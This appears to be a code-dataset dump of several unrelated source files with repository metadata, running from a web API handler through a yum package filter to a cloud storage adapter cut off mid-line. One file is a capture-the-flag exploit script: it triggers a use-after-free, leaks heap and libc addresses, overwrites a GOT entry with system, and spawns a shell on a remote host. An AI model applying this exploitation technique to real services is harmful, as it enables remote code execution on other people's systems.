for column in obj.__table__.columns.keys():
result_dict[column] = to_json_type(getattr(obj, column, None))
result_dict['__url__'] = request.link(self)
# add links to related resources
result_dict['__links__'] = dict()
for foreign_key in obj.__table__.foreign_keys:
column_names = foreign_key.constraint.columns
column_values = [getattr(obj, column_name, None) for column_name in column_names]
if [val for val in column_values if val]:
table = foreign_key.column.table.name
result_dict['__links__'][foreign_key.name or str(foreign_key)] = request.link(Record(table, column_values))
return result_dict
@DamvitoolApp.json(model=Record, request_method='PATCH', permission=Identity)
def record_patch(self, request):
"""Upgrade record data
"""
r = self.patch(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, request_method='PUT', permission=Identity)
def record_put(self, request):
"""Replace record data
"""
r = self.replace(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, request_method='DELETE', permission=Identity)
def record_put(self, request):
"""Delete record
"""
self.remove()
return {}
@DamvitoolApp.json(model=UniGridRequest, request_method='POST', permission=Identity)
def uni_grid_request(self, request):
return self.query(request.json)
@DamvitoolApp.json(model=UniGridRequest, name='summaries', request_method='POST', permission=Identity)
def uni_grid_request_summaries(self, request):
return self.query_summaries(request.json)
@DamvitoolApp.view(model=UniGridRequest, name='export', request_method='POST', permission=Identity)
def uni_grid_request_export(self, request):
return self.query_export(request.json)
@DamvitoolApp.view(model=Exception)
def error(self, request):
"""Error view
Return json object with error description if code raise Exception exception
"""
data = {
'code': 500,
'error': str(self)
}
return Response(dumps(data), content_type='application/json', status=500)
@DamvitoolApp.view(model=HTTPException)
def http_error(self, request):
"""HTTP error view
If morepath or other code raise HTTPException exception, return json response with data about error
"""
data = {
'code': self.code,
'error': str(self)
}
return Response(dumps(data), content_type='application/json', status=self.code)
| lgpl-3.0 | -5,720,538,941,035,803,000 | 28.119403 | 119 | 0.69631 | false | 3.47153 | false | false | false |
scwuaptx/CTF | 2017-writeup/secuinside/vvc.py | 1 | 3513 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "52.79.83.139"
port = 31337
r = remote(host,port)
def register(ids,pw,name,types,profile=None):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(types))
r.recvuntil(":")
r.sendline(ids)
r.recvuntil(":")
r.sendline(pw)
r.recvuntil(":")
r.sendline(name)
if types == 2 :
r.recvuntil(":")
r.sendline(profile)
def login(ids,pw):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(ids)
r.recvuntil(":")
r.sendline(pw)
def writemusic(name,lyc):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(lyc)
def delmusic(idx):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def createbox(name):
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
def delbox(idx):
r.recvuntil(">")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def buymusic(idx):
r.recvuntil(">")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
def putmusic(box,idx):
r.recvuntil(">")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(box))
r.recvuntil(">")
r.sendline(str(idx))
def ret():
r.recvuntil(">")
r.sendline("5")
def ret9():
r.recvuntil(">")
r.sendline("9")
def delu(idx):
r.recvuntil(">")
r.sendline("8")
r.recvuntil(":")
r.sendline(str(idx))
def mov_box_box(src,dest,idxs,idxd):
r.recvuntil(">")
r.sendline("5")
r.recvuntil(":")
r.sendline(str(src))
r.recvuntil(":")
r.sendline(str(dest))
r.recvuntil(":")
r.sendline(str(idxs))
r.recvuntil(":")
r.sendline(str(idxd))
def editpro(data):
r.recvuntil(">")
r.sendline("3")
r.recvuntil(":")
r.sendline(data)
def showbox():
r.recvuntil(">")
r.sendline("6")
def editmusic(idx,lyc):
r.recvuntil(">")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
r.sendline(lyc)
register("ddaa","nogg","phd",1)
register("orange","nogg","phd",2,"wtf")
login("orange","nogg")
writemusic("meh","qq")
ret()
login("ddaa","nogg")
createbox("meh")
buymusic(0)
putmusic(0,0)
ret9()
login("orange","nogg")
delmusic(0)
ret()
login("ddaa","nogg")
delu(0)
mov_box_box(0,0,0,0) #trigger uaf
reg = 0x607340
createbox(p64(reg))
showbox()
r.recvuntil("Lyrics : ")
heap = u64(r.recvuntil("-")[:-1].ljust(8,"\x00")) - 0x11f30
print hex(heap)
ret9()
login("orange","nogg")
writemusic("lays","nogg")
writemusic("laysnogg","nogg")
ret()
login("ddaa","nogg")
createbox("mehqq")
buymusic(0)
putmusic(2,0)
ret9()
login("orange","nogg")
delmusic(0)
ret()
login("ddaa","nogg")
delu(0)
fake_music = heap + 0x12340
mov_box_box(2,2,0,0)
createbox(p64(fake_music))
delbox(2)
orange = heap + 0x11eb0
ret9()
register("angelboy","xx","angel",2,"a"*0x20)
login("angelboy","xx")
strlen_got = 0x605078
fake_music = p64(strlen_got)*2 + p64(0) + p64(orange)
editpro(fake_music)
ret()
login("ddaa","nogg")
r.recvuntil(">")
r.sendline("3")
r.recvuntil("1. ")
libc = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x8b720
print hex(libc)
r.recvuntil(":")
r.sendline("4")
ret9()
login("angelboy","xx")
system = libc + 0x45390
editmusic(1,p64(system)[:6])
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")
r.sendline("sh")
r.recvuntil(":")
r.sendline("sh")
r.interactive()
| gpl-2.0 | -7,201,957,698,225,920,000 | 17.489474 | 61 | 0.592941 | false | 2.558631 | false | false | false |
tedoreve/tools | maxwell.py | 1 | 1264 | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 20 12:11:24 2018
@author: tedoreve
"""
import matplotlib.pyplot as plt
import numpy as np
import astropy.constants as con
import astropy.units as un
def maxwell(T,m,v):
a = np.sqrt(con.k_B*T/con.m_e)
print('a=',a.to('km/s'))
return np.sqrt(2/np.pi)*v**2/a**3 * np.exp(-v**2/2/a**2)
def ptotal(v):
dv = v[1]-v[0]
p = maxwell(T,con.m_e,v).to('s/km')*dv
return np.sum(p)
def accelerator(p,n,v):
fin = np.zeros(len(v))
for i in range(len(v)):
fin[i] = maxwell(T,con.m_e,v[i])*(1-p) + fin[i-1]*p
return fin
if __name__ == '__main__':
T = 50*un.K #ISM temperature before shock wave arrival
p = 0.5 #possibility that the particle remain within the accelerator after each cycle
n = 1 #the cycle times
dv= 1 #speed addition after each cycle
fig, ax = plt.subplots(1, 1)
v = np.linspace(0,200, (201-0)/dv)*un.km/un.s
ax.plot(v, maxwell(T,con.m_e,v).to('s/km'),'r-', lw=5, alpha=0.6, label='maxwell pdf')
ax.set_xlabel('v (km/s)')
ax.set_ylabel('pdf (possibility per km/s)')
ax.set_title('Maxwell Speed Distribution')
plt.legend() | mit | -5,786,362,109,074,876,000 | 25.521739 | 94 | 0.554589 | false | 2.672304 | false | false | false |
jessegonzalez/grinder | src/grinder/Filter.py | 2 | 3819 | # This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
# Filters for syncing remote package repos
# Grabbed from Pulp by John Morris <[email protected]>
#
# This is the main feature I wanted Pulp for; my use case is downloading
# a limited set of packages (whitelist) from a repo without having
# to sync the whole thing, but still retain yum's smarts for grabbing new
# versions and removing old ones
import re
import logging
LOG = logging.getLogger("grinder.Filter")
class Filter(object):
"""
Class represents a 'blacklist' or 'whitelist' filter type that can be
applied when syncing a local repository
regex_list is a list of regex strings to be applied to package 'filename'
(see below); if any regex matches, the Filter.test() will be true for
whitelists or false for blacklists
use the set_regex_list method to change the regex list after object
creation; this ensures that the regexes are compiled
(actually, using 'filename' seems hackish, but it's easy to do from
the command line and with simple regexes)
(more hackish still, because the closest yum.packages.PackageObject
appears to have to a 'filename' is its '__str__()', used instead
of some actual RPM filename)
"""
def __init__(self, type, regex_list=None, description=None):
self.description = description
self.type = type
self.set_regex_list(regex_list)
def __str__(self):
return "%s, %s filter with: %s" % (self.description, self.type, self.regex_list)
def set_regex_list(self,regex_list):
"""
Set the list of regexes & list of compiled regexes
"""
self.regex_list = []
self.regex_obj_list = []
if not regex_list:
return
for regex in regex_list:
self.regex_list.append(regex)
self.regex_obj_list.append(re.compile(regex))
def iswhitelist(self):
"""
return true if self is a whitelist
"""
return self.type == "whitelist"
def isblacklist(self):
"""
return true if self is a blacklist
"""
return self.type == "blacklist"
def test(self, pkg):
"""
return pkg if pkg passes through the filter, else None
pkg is a yum package object
"""
# the string we match against
pkg_filename = str(pkg)
# compare pkg to each regex & break if there's a match
match_result = None
for regex_obj in self.regex_obj_list:
if regex_obj.match(pkg_filename):
match_result = regex_obj.pattern
break
# return result based on match and filter type
if self.iswhitelist():
if match_result:
LOG.debug ("package %s: passed whitelist, matched %s" %
(pkg_filename, match_result))
return pkg
else:
LOG.debug ("package %s: blocked by whitelist" % pkg_filename)
return None
else:
if match_result:
LOG.debug ("package %s: blocked by blacklist, matched %s" %
(pkg_filename, match_result))
return None
else:
LOG.debug ("package %s: passed blacklist" % pkg_filename)
return pkg
| gpl-2.0 | 3,908,979,287,542,238,700 | 34.691589 | 88 | 0.622414 | false | 4.248053 | false | false | false |
ihsoft/EasyVesselSwitch | Tools/clients/SpacedockClient.py | 1 | 5778 | # Public domain license.
# Author: [email protected]
# GitHub: https://github.com/ihsoft/KSPDev_ReleaseBuilder
# $version: 1
# $date: 07/13/2018
"""A client library to communicate with Spacedock via API.
Example:
import SpacedockClient
print 'KSP 1.4.*:', SpacedockClient.GetVersions(r'1\.4\.\d+')
SpacedockClient.API_LOGIN = 'foo' # Skip to have it asked from the console.
SpacedockClient.API_PASS = 'bar' # Skip to have it asked from the console.
CurseForgeClient.UploadFile(
'/var/files/archive.zip', '# BLAH!', '1.4.4', 'MyMod-1.4')
"""
import json
import logging
import re
import urllib2
from utils import FormDataUtil
# The account credentials.
API_LOGIN = None
API_PASS = None
# Endpoint for all the API requests
API_BASE_URL = 'https://spacedock.info'
# The actions paths.
API_AUTHORIZE = '/api/login'
API_UPDATE_MOD_TMPL = '/api/mod/{mod_id}/update'
API_GET_VERSIONS = '/api/kspversions'
API_GET_MOD = '/api/mod/{mod_id}'
LOGGER = logging.getLogger('ApiClient')
# The cache for the known versions of the game. It's requested only once.
cached_versions = None
# The authorization cookie. It's only created once. To refresh it, simply
# set it to None.
authorized_cookie = None
class Error(Exception):
"""Genric API client error."""
pass
class AuthorizationRequiredError(Error):
"""The method called requires authorization, but none has been provided."""
pass
class BadCredentialsError(Error):
"""The provided authorization token is refused."""
pass
class BadResponseError(Error):
"""Generic error from the API endpoint."""
pass
def GetKSPVersions(pattern=None):
"""Gets the available versions of the game.
This method caches the versions, fetched from the server. It's OK to call it
multiple times, it will only request the server once.
This call does NOT require authorization.
Args:
pattern: A regexp string to apply on the result. If not provided, all the
versions will be returned.
Returns:
A list of objects: { 'name': <KSP name>, 'id': <Spacedock ID> }. The list
will be filtered if the pattern is set.
"""
global cached_versions
if not cached_versions:
LOGGER.debug('Requesting versions to cache...')
response = _CallAPI(_MakeAPIUrl(API_GET_VERSIONS), None, None)
cached_versions = map(
lambda x: {'name': x['friendly_version'], 'id': x['id']}, response[0])
if pattern:
regex = re.compile(pattern)
return filter(lambda x: regex.match(x['name']), cached_versions)
return cached_versions
def GetModDetails(mod_id):
"""Gets the mod informnation.
This call does NOT require authorization.
Args:
mod_id: The mod to request.
Returns:
The response object.
"""
url = _MakeAPIUrl(API_GET_MOD, mod_id=mod_id)
response_obj, _ = _CallAPI(url, None, None)
return response_obj
def UploadFile(mod_id, filepath, changelog, mod_version, game_version):
"""Uploads the file to the CurseForge project.
The new file immediately becomes a default version.
Args:
mod_id: The mod ID to update.
filepath: A full or relative path to the local file.
changelog: The change log content.
mod_version: The version of the mod being published.
game_version: The KSP version to publish for.
Returns:
The response object.
"""
headers, data = FormDataUtil.EncodeFormData([
{ 'name': 'version', 'data': mod_version },
{ 'name': 'changelog', 'data': changelog },
{ 'name': 'game-version', 'data': game_version },
{ 'name': 'notify-followers', 'data': 'yes' },
{ 'name': 'zipball', 'filename': filepath },
])
url, headers = _GetAuthorizedEndpoint(
API_UPDATE_MOD_TMPL, headers, mod_id=mod_id)
resp = _CallAPI(url, data=data, headers=headers)
def _MakeAPIUrl(action_path, **kwargs):
"""Makes a URL for the action."""
return API_BASE_URL + action_path.format(**kwargs)
def _CallAPI(url, data, headers, raise_on_error=True):
"""Invokes the API call."""
resp_obj = { 'error': True, 'reason': 'unknown' }
try:
request = urllib2.Request(url, data, headers=headers or {})
response = urllib2.urlopen(request)
resp_obj = json.loads(response.read())
headers = response.info().dict
except urllib2.HTTPError as ex:
resp_obj = { 'error': True, 'reason': '%d - %s' % (ex.code, ex.reason) }
try:
resp_obj = json.loads(ex.read())
except:
pass # Not a JSON response
if ex.code == 401:
raise AuthorizationRequiredError(resp_obj['reason'])
if type(resp_obj) is dict and resp_obj.get('error'):
LOGGER.error('API call failed: %s', resp_obj['reason'])
if raise_on_error:
raise BadResponseError(resp_obj['reason'])
return resp_obj, None
return resp_obj, headers
def _GetAuthorizedEndpoint(api_path, headers=None, **kwargs):
"""Gets API URL and the authorization headers.
The login/password must be set in the global variables API_LOGIN/API_PASS.
"""
global authorized_cookie
url = _MakeAPIUrl(api_path, **kwargs)
LOGGER.debug('Getting authorized endpoint for: %s', url)
if not headers:
headers = {}
if not authorized_cookie:
if not API_LOGIN or not API_PASS:
raise BadCredentialsError('API_LOGIN and/or API_PASS not set')
LOGGER.info('Authorizing for login: %s', API_LOGIN)
auth_headers, data = FormDataUtil.EncodeFormData([
{ 'name': 'username', 'data': API_LOGIN },
{ 'name': 'password', 'data': API_PASS },
])
resp, auth_headers = _CallAPI(
API_BASE_URL + API_AUTHORIZE, data, auth_headers,
raise_on_error=False)
if resp['error']:
raise BadCredentialsError(resp['reason'])
authorized_cookie = auth_headers['set-cookie']
headers['Cookie'] = authorized_cookie
return url, headers
| unlicense | 1,102,166,776,733,838,200 | 28.329949 | 78 | 0.676878 | false | 3.508197 | false | false | false |
solvebio/solvebio-python | solvebio/cli/main.py | 1 | 17065 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
import copy
import argparse
import solvebio
from . import auth
from . import data
from .tutorial import print_tutorial
from .ipython import launch_ipython_shell
from ..utils.validators import validate_api_host_url
from ..utils.files import get_home_dir
class TildeFixStoreAction(argparse._StoreAction):
"""A special "store" action for argparse that replaces
any detected home directory with a tilde.
(reverses bash's built-in ~ expansion).
"""
def __call__(self, parser, namespace, values, option_string=None):
home = get_home_dir()
if values and values.startswith(home):
values = values.replace(home, '~', 1)
setattr(namespace, self.dest, values)
# KEY=VALUE argparser
# https://stackoverflow.com/a/56521375/305633
class KeyValueDictAppendAction(argparse.Action):
"""
argparse action to split an argument into KEY=VALUE form
on the first = and append to a dictionary.
"""
def __call__(self, parser, args, values, option_string=None):
assert(len(values) == 1)
try:
(k, v) = values[0].split("=", 2)
except ValueError:
raise argparse.ArgumentError(
self, "could not parse argument '{}' as k=v format"
.format(values[0]))
d = getattr(args, self.dest) or {}
d[k] = v
setattr(args, self.dest, d)
class SolveArgumentParser(argparse.ArgumentParser):
"""
Main parser for the SolveBio command line client.
"""
subcommands = {
'login': {
'func': auth.login_and_save_credentials,
'help': 'Login and save credentials'
},
'logout': {
'func': auth.logout,
'help': 'Logout and delete saved credentials'
},
'whoami': {
'func': auth.whoami,
'help': 'Show your SolveBio email address'
},
'tutorial': {
'func': print_tutorial,
'help': 'Show the SolveBio Python Tutorial',
},
'shell': {
'func': launch_ipython_shell,
'help': 'Open the SolveBio Python shell'
},
'import': {
'func': data.import_file,
'help': 'Import a local file into a SolveBio dataset',
'arguments': [
{
'flags': '--create-vault',
'action': 'store_true',
'help': 'Create the vault if it doesn\'t exist',
},
{
'flags': '--create-dataset',
'action': 'store_true',
'help': 'Create the dataset if it doesn\'t exist',
},
{
'flags': '--capacity',
'default': 'small',
'help': 'Specifies the capacity of the created dataset: '
'small (default, <100M records), '
'medium (<500M), large (>=500M)'
},
{
'name': '--tag',
'help': 'A tag to be added. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
},
{
'name': '--metadata',
'help': 'Dataset metadata in the format KEY=VALUE ',
'nargs': 1,
'metavar': 'KEY=VALUE',
'action': KeyValueDictAppendAction
},
{
'name': '--metadata-json-file',
'help': 'Metadata key value pairs in JSON format'
},
{
'flags': '--template-id',
'help': 'The template ID used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--template-file',
'help': 'A local template file to be used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--follow',
'action': 'store_true',
'default': False,
'help': 'Follow the import\'s progress until it completes'
},
{
'flags': '--commit-mode',
'default': 'append',
'help': 'Commit mode to use when importing data. '
'Options are "append" (default), "overwrite",'
'"upsert", or "delete"'
},
{
'flags': '--remote-source',
'action': 'store_true',
'default': False,
'help': 'File paths are remote globs or full paths on '
'the SolveBio file system.'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not create any datasets or '
'import any files.',
'action': 'store_true'
},
{
'name': 'full_path',
'help': 'The full path to the dataset in the format: '
'"domain:vault:/path/dataset". ',
'action': TildeFixStoreAction
},
{
'name': 'file',
'help': 'One or more files to import. Can be local files, '
'folders, globs or remote URLs. Pass --remote-source in '
'order to list remote full_paths or path globs on the '
'SolveBio file system.',
'nargs': '+'
},
]
},
'create-dataset': {
'func': data.create_dataset,
'help': 'Create a SolveBio dataset',
'arguments': [
{
'flags': '--create-vault',
'action': 'store_true',
'help': 'Create the vault if it doesn\'t exist',
},
{
'flags': '--template-id',
'help': 'The template ID used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--template-file',
'help': 'A local template file to be used when '
'creating a new dataset (via --create-dataset)',
},
{
'flags': '--capacity',
'default': 'small',
'help': 'Specifies the capacity of the dataset: '
'small (default, <100M records), '
'medium (<500M), large (>=500M)'
},
{
'name': '--tag',
'help': 'A tag to be added. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
},
{
'name': '--metadata',
'help': 'Dataset metadata in the format KEY=VALUE ',
'nargs': 1,
'metavar': 'KEY=VALUE',
'action': KeyValueDictAppendAction
},
{
'name': '--metadata-json-file',
'help': 'Metadata key value pairs in JSON format'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not create the dataset',
'action': 'store_true'
},
{
'name': 'full_path',
'help': 'The full path to the dataset in the format: '
'"domain:vault:/path/dataset". '
'Defaults to your personal vault if no vault is provided. '
'Defaults to the vault root if no path is provided.',
'action': TildeFixStoreAction
},
]
},
'upload': {
'func': data.upload,
'help': 'Upload a file or directory to a SolveBio Vault',
'arguments': [
{
'flags': '--full-path',
'help': 'The full path where the files and folders should '
'be created, defaults to the root of your personal vault',
'action': TildeFixStoreAction,
'default': '~/'
},
{
'flags': '--create-full-path',
'help': 'Creates --full-path location if it does '
'not exist. NOTE: This will not create new vaults.',
'action': 'store_true',
},
{
'flags': '--exclude',
'help': 'Paths to files or folder to be excluded from '
'upload. Unix shell-style wildcards are supported.',
'action': 'append'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not upload any files or '
'create any folders.',
'action': 'store_true'
},
{
'name': 'local_path',
'help': 'The path to the local file or directory '
'to upload',
'nargs': '+'
}
]
},
'download': {
'func': data.download,
'help': 'Download one or more files from a SolveBio Vault.',
'arguments': [
{
'flags': '--dry-run',
'help': 'Dry run mode will not download any files or '
'create any folders.',
'action': 'store_true'
},
{
'flags': 'full_path',
'help': 'The full path to the files on SolveBio. Supports '
'Unix style globs in order to download multiple files. '
'Note: Downloads are not recursive.',
'action': TildeFixStoreAction
},
{
'name': 'local_path',
'help': 'The path to the local directory where '
'to download files.',
}
]
},
'tag': {
'func': data.tag,
'help': 'Apply tags or remove tags on objects',
'arguments': [
{
'flags': 'full_path',
'help': 'The full path of the files, '
'folders or datasets to apply the tag updates. '
'Unix shell-style wildcards are supported. ',
'nargs': '+'
},
{
'name': '--tag',
'help': 'A tag to be added/removed. '
'Files, folders and datasets can be tagged. '
'Tags are case insensitive strings. Example tags: '
'--tag GRCh38 --tag Tissue --tag "Foundation Medicine"',
'action': 'append',
'required': True
},
{
'flags': '--remove',
'help': 'Will remove tags instead of adding them.',
'action': 'store_true'
},
{
'flags': '--exclude',
'help': 'Paths to files or folder to be excluded from '
'tagging. Unix shell-style wildcards are supported.',
'action': 'append'
},
{
'flags': '--tag-folders-only',
'help': 'Will only apply tags to folders (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--tag-files-only',
'help': 'Will only apply tags to files (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--tag-datasets-only',
'help': 'Will only apply tags to datasets (tags '
'all objects by default). ',
'action': 'store_true'
},
{
'flags': '--dry-run',
'help': 'Dry run mode will not save tags.',
'action': 'store_true'
},
{
'flags': '--no-input',
'help': 'Automatically accept changes (overrides '
'user prompt)',
'action': 'store_true'
},
]
},
'queue': {
'func': data.show_queue,
'help': 'Shows the current job queue, grouped by User',
}
}
def __init__(self, *args, **kwargs):
super(SolveArgumentParser, self).__init__(*args, **kwargs)
self._optionals.title = 'SolveBio Options'
self.add_argument(
'--version',
action='version',
version=solvebio.version.VERSION)
self.add_argument(
'--api-host',
help='Override the default SolveBio API host',
type=self.api_host_url)
self.add_argument(
'--api-key',
help='Manually provide a SolveBio API key')
self.add_argument(
'--access-token',
help='Manually provide a SolveBio OAuth2 access token')
def _add_subcommands(self):
"""
The _add_subcommands method must be separate from the __init__
method, as infinite recursion will occur otherwise, due to the fact
that the __init__ method itself will be called when instantiating
a subparser, as we do below
"""
subcmd_params = {
'title': 'SolveBio Commands',
'dest': 'subcommands'
}
subcmd = self.add_subparsers(
**subcmd_params) # pylint: disable=star-args
subcommands = copy.deepcopy(self.subcommands)
for name, params in subcommands.items():
p = subcmd.add_parser(name, help=params['help'])
p.set_defaults(func=params['func'])
for arg in params.get('arguments', []):
name_or_flags = arg.pop('name', None) or arg.pop('flags', None)
p.add_argument(name_or_flags, **arg)
def parse_solvebio_args(self, args=None, namespace=None):
"""
Try to parse the args first, and then add the subparsers. We want
to do this so that we can check to see if there are any unknown
args. We can assume that if, by this point, there are no unknown
args, we can append shell to the unknown args as a default.
However, to do this, we have to suppress stdout/stderr during the
initial parsing, in case the user calls the help method (in which
case we want to add the additional arguments and *then* call the
help method. This is a hack to get around the fact that argparse
doesn't allow default subcommands.
"""
try:
sys.stdout = sys.stderr = open(os.devnull, 'w')
_, unknown_args = self.parse_known_args(args, namespace)
if not unknown_args:
args.insert(0, 'shell')
except SystemExit:
pass
finally:
sys.stdout.flush()
sys.stderr.flush()
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
self._add_subcommands()
return super(SolveArgumentParser, self).parse_args(args, namespace)
def api_host_url(self, value):
validate_api_host_url(value)
return value
def main(argv=sys.argv[1:]):
""" Main entry point for SolveBio CLI """
parser = SolveArgumentParser()
args = parser.parse_solvebio_args(argv)
solvebio.login(
api_host=args.api_host or solvebio.api_host,
api_key=args.api_key or solvebio.api_key,
access_token=args.access_token or solvebio.access_token)
return args.func(args)
if __name__ == '__main__':
main()
| mit | -1,924,010,282,670,942,200 | 37.784091 | 79 | 0.438558 | false | 4.861823 | false | false | false |
luigivieira/fsdk | fsdk/detectors/test-emotions.py | 1 | 4073 | #!/usr/bin/env python
#
# This file is part of the Fun SDK (fsdk) project. The complete source code is
# available at https://github.com/luigivieira/fsdk.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import numpy as np
import pandas as pd
from sklearn import svm
from sklearn.model_selection import cross_val_score
from sklearn.metrics import accuracy_score, precision_score, recall_score
#---------------------------------------------
def readData(annotationPath):
##################################
# Read the data
##################################
print('Reading data...')
subjects = [1, 2, 4, 6, 7, 14, 15, 17, 18, 20, 21, 22, 23, 25, 26, 27, 30, 32, 33, 34, 37, 38, 39, 40, 41]
fileName = '{}/../subjects.csv'.format(annotationPath)
games = pd.read_csv(fileName, sep=',', usecols=[0, 5], index_col=0)
data = pd.DataFrame(columns=['neutral', 'happiness', 'sadness', 'anger',
'fear', 'surprise', 'disgust', 'game'])
for subject in subjects:
game = games.loc[subject]['Game Played']
print('subject: {} game: {}'.format(subject, game))
# Read the face data
name = '{}/player_{:03d}-face.csv' \
.format(annotationPath, subject)
face = pd.read_csv(name, index_col=0, usecols=(0, 1, 2, 3, 4, 142))
# Find the frames where the face detection failed
t = (face[[0, 1, 2, 3]] == 0).all(1)
fails = face[t].index[:]
# Read the emotion data
name = '{}/player_{:03d}-emotions.csv' \
.format(annotationPath, subject)
df = pd.read_csv(name, index_col=0)
# Drop the rows where face detection failed
df = df.drop(fails)
# Add the game column
df['game'] = [game for _ in range(len(df))]
# Rename the columns accordingly to the return
df.columns = ['neutral', 'happiness', 'sadness', 'anger', 'fear',
'surprise', 'disgust', 'game']
# Append to the data read
data = data.append(df)
return data
#---------------------------------------------
def main():
# Read the data
annotationPath = 'C:/Users/luigi/Dropbox/Doutorado/dataset/annotation'
data = readData(annotationPath)
# Split the data into features (x) and labels (y)
df = data[['neutral', 'happiness', 'sadness', 'anger', 'fear', 'surprise',
'disgust']]
x = np.array(df.values.tolist())
y = np.array(data['game'].tolist())
# Create the SVM classifier
clf = svm.SVC(kernel='rbf', gamma=0.001, C=10, decision_function_shape='ovr')
# Perform the cross validation
scores = cross_val_score(clf, x, y, cv=5, n_jobs=-1)
print(scores)
return 0
#---------------------------------------------
# namespace verification for running this script
#---------------------------------------------
if __name__ == '__main__':
sys.exit(main()) | mit | -7,315,364,115,541,169,000 | 34.736842 | 110 | 0.605696 | false | 3.81367 | false | false | false |
danianr/NINJa | cloudadapter.py | 1 | 8320 | from socket import *
from datetime import *
from subprocess import Popen, PIPE
from collections import deque
import sys
import os
import time
import random
import copy
class IndexView(object):
def __init__(self, username, indexFunc, displayFunc):
self.username = username
self.timestamp = time.time()
self.indexFunc = indexFunc
self.displayFunc = displayFunc
self.internal = self.indexFunc(username)
self.refreshReq = deque()
self.dirty = False
self.delay = 120
def refresh(self, event=None):
now = time.time()
self.refreshReq.append(now)
for req in self.refreshReq:
if (req + self.delay) < now or self.dirty:
break
else:
return
self.internal = self.indexFunc(self.username)
self.timestamp = now
self.refreshReq.clear()
def isDirty(self):
return self.dirty
def setDirty(self):
self.dirty = True
def map(self, iterable):
return map(lambda i: self.internal[int(i)], iterable)
# Only define getter accessors since this is technically
# a read-only snapshot
def __getitem__(self, x):
return self.internal[x]
def __getslice__(self, x, y):
return self.internal[x:y]
def __len__(self):
return len(self.internal)
def __iter__(self):
return iter(map(self.displayFunc, self.internal))
class CloudAdapter(object):
def __init__(self, path, maxsize=2147483647):
self.controlpath = path
self.sftp = '/usr/bin/sftp'
self.landing = '/svc/landing'
self.remote_path = '/svc/remote'
self.maxsize = maxsize
if not os.path.exists(self.controlpath):
e = OSError()
e.errno=2
e.strerror='No such file or directory'
e.filename=path
raise e
def _topoCalc(self, gridlist):
print >> sys.stderr, time.time(), "Entrance into CloudAdapter._topoCalc(", repr(gridlist), ")"
remaining = copy.copy(gridlist)
topolist = []
thishost = getfqdn()
if thishost in remaining:
remaining.remove(thishost)
topolist.append(thishost)
for timeoutval in [ 0.000260, 0.000650, 0.002000 ]:
for node in remaining:
s = socket()
s.settimeout(timeoutval)
iaddr = ( gethostbyname(node), 22 )
try:
s.connect(iaddr)
s.close()
topolist.append(node)
remaining.remove(node)
except timeout:
print >> sys.stderr, time.time(), 'Unable to connect to node %s within %fs\n' % (node, timeoutval)
topolist.extend(remaining)
print >> sys.stderr, time.time(), "Return from CloudAdapter._topoCalc => ", repr(topolist)
return topolist
def _getfile(self, cmd):
s = socket(AF_UNIX, SOCK_STREAM, 0)
s.connect(self.controlpath)
s.sendall(cmd)
return s.makefile()
def _retrieve(self, node, username, sha512):
command_script = 'cd %s/%s\nget %s\nexit\n' % (self.remote_path, username, sha512)
return self._sftp_wrapper(node, command_script)
def _store(self, node, username, sha512, file):
command_script = 'mkdir %s/%s\ncd %s/%s\nput %s %s\nexit\n' % (self.remote_path,
